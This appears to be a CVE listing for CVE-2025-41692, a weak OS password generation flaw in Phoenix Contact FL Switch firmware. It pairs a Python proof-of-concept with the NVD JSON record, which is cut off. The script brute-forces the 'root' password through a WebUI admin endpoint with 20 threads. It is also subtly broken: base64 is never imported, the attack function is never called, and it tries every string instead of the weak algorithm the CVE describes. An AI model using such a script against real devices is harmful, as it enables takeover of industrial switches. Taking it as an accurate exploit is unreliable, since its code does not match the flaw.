CVE-2025-41692

# CVE-2025-41692 PoC - WebUI弱密码生成算法暴力破解 # Requirements: requests, concurrent.futures import requests import time from concurrent.futures import ThreadPoolExecutor from itertools import product import string TARGET_URL = "https://TARGET_IP/admin/system_password_check" USERNAME = "admin" HEADERS = { "Authorization": "Basic " + base64.b64encode(b"admin:admin").decode(), "Content-Type": "application/json" } def generate_candidate_passwords(prefix, length=8): """Generate candidate passwords based on weak algorithm patterns""" charset = string.ascii_lowercase + string.digits for combo in product(charset, repeat=length): yield prefix + ''.join(combo) def try_password(password): """Attempt to authenticate with a specific password""" try: data = {"username": "root", "password": password} response = requests.post(TARGET_URL, json=data, headers=HEADERS, timeout=5, verify=False) if response.status_code == 200 and "success" in response.text.lower(): print(f"[+] Valid password found: {password}") return password except requests.RequestException: pass return None def brute_force_attack(prefix=""): """Execute brute-force attack with threading""" passwords = generate_candidate_passwords(prefix) with ThreadPoolExecutor(max_workers=20) as executor: for result in executor.map(try_password, passwords): if result: return result return None if __name__ == "__main__": print("[*] Starting CVE-2025-41692 brute-force attack...") print("[*] Target:", TARGET_URL) print("[*] Note: Requires valid WebUI admin credentials first") # Usage: python cve-2025-41692_poc.py

{"cve": {"id": "CVE-2025-41692", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:48.180", "lastModified": "2025-12-19T18:11:54.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A high privileged remote attacker with admin privileges for the webUI can brute-force the \"root\" and \"user\" passwords of the underlying OS due to a weak password generation algorithm."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-916"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2708_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "2084EFDB-9B37-4B62-8F09-C0A478D225F5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2708_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "D1E0F77C-F116-4BF6-9ED4-39C5B2BE45D0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2708_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "0F69B73C-5009-4FDE-AC40-03089D1724DB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2708:-:*:*:*:*:*:*:*", "matchCriteriaId": "ACF0F7C6-D8C8-409D-B32E-33651C2768D3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2608_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "9D8B1EE5-CD80-4963-8E64-57ED5B75A236"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2608_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "7E2028DD-24BD-4541-B437-E7F97420BECE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2608_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "FEB4D4F4-DAA9-4D15-BD23-D2F8D20651F0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2608:-:*:*:*:*:*:*:*", "matchCriteriaId": "9066088C-2056-446A-A835-3A4F8EC71F69"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2516_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "3B6BC580-8BDE-458D-852C-09E54FD43F36"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2516_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "D25577D8-A076-4950-B28B-5587DF927425"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2208c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "010F7AFC-8E6B-4578-86CB-81E68535AF59"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2208c:-:*:*:*:*:*:*:*", "matchCriteriaId": "88AAEC46-8163-41F5-8E3D-42F650024A21"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2208_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "88B80F56-8B2F-421B-B4D3-56FDDFA5A12A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2208_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "192418D5-9943-45B9-A2E3-42EAF53B1961"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2208_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "321C38BD-C448-476F-BBA9-5FCB1AA6CB43"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2208:-:*:*:*:*:*:*:*", "matchCriteriaId": "AFC8DDBB-B2F9-49A6-AF2E-069406D39C4E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": ... (truncated)